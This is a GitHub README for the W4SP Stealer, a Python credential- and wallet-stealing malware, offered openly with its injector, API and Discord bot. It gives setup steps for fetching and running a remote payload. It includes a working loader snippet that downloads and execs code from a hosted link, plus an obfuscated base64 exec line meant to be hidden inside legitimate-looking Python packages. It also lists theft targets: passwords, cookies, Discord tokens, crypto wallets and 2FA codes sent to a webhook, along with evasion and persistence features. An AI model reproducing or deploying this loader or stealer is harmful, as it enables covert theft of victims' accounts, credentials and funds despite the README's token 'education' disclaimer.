/W4SP-Stealer-Sourcecode

Official publication of the full w4sp stealer source code, with api and bot

Primary LanguagePython

🐝 W4SP Stealer 🐝

⚠️ Im not updating this repo, plz look here for last version and updates/issues ⚠️

w4sp Stealer official source code, one of the best python stealer on the web
W4SP Stealer | W4SP API | W4SP Bot


Stealer by @loTus04 and API & Bot by @billythegoat356
(for education purpose only)

🚩 Table of Content

  • Setup - Stealer
  • Setup - API & Bot
  • Features - Stealer
  • Features - Injector
  • Features - Api
  • Features - Bot
  • Demo

Setup [Stealer & Injector]

1. Put ur webhook in wasp.py: hook = "DISCORD_WEBHOOK"
2. Obfuscate & Upload anywhere (needs to be accessible with an http request)
3. Put wasp.py link in injector.py: request.urlopen("W4SPGRAB").read()
4. Obfuscate it

Setup [Line ~ Optional but recomanded]

from tempfile import NamedTemporaryFile as _ffile
from sys import executable as _eexecutable
from os import system as _ssystem
_ttmp = _ffile(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen("INJECTOR_LINK").read())""")
_ttmp.close()
try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
except: pass

# replace INJECTOR_LINK by the injector.py link from setup
# (this script was made by Bill)
# encode in b64 the last payload and replace it here
# then hide this line in a legit looking python script
# or use ur brain and ur own technique, this is just un exemple
# remeber, its for education purpose, attacking a machine w/o autorisation is illegal !

__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').exec(__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').compile(__import__('\x62\x61\x73\x65\x36\x34').b64decode("%PAYLOAD%"),'<string>','\x65\x78\x65\x63'))

Setup [API]

Features [Stealer]

(Stealer by @loTus04)

Global

  • Saved Passwords
  • Browser Cookies
  • Get PC information
  • AntiVM - Trust Factor system, it wont send data if Gmail cookies arent' found
  • All files are uploaded to an external api <- Improved by xKian
  • Data is send throught a Discord webhook

Discord

  • Discord Tokens from browsers
  • Discord Token from discord, discordcanary, discordPTBa
  • Get all info on token (email, nitro/badge, rare friends)

Wallets

  • Exodus Wallet
  • Metamask Wallet
  • Atomic Walletk

Gaming

  • Steam Client
  • Riot Client
  • NationsGlory Client

Other

  • Telegram Session

File Stealer

  • It will search throught the pc for: saved passwords, 2fa codes, wallet keys and other sensitive information
    (idea came from Kiwi plugin on msf)

Features [Injector]

(Injector by @loTus04)

  • Brilliant persistance technique (only in injector v1.1)
  • Invisible in TaskManger StartUP tab (only in injector v1.1)
  • FUD
  • Fully runs in background
  • Hides the stealer very well

Credit to xKian who improved the injector (v1.2)

Features [API]

(Api by @billythegoat356)

  • Easy to update/upgrade
  • Compatible with all w4sp versions
  • Using auto & custom obfuscation
  • Manage Users and Webhooks with API
  • Browser security => If a browser is detected (headers) it will obfusacate a fake wasp script <- Brilliant Idea by lath

Features [BOT]

(Bot by @billythegoat356)

  • Easy to configure
  • Manage Users and Webhooks using w4sp api
  • Auto inject file.py

Few articles on W4SP (they where writen during beta-testing)
⚠️Most articles writen after that are 95% bullshit⚠️

ScreenShots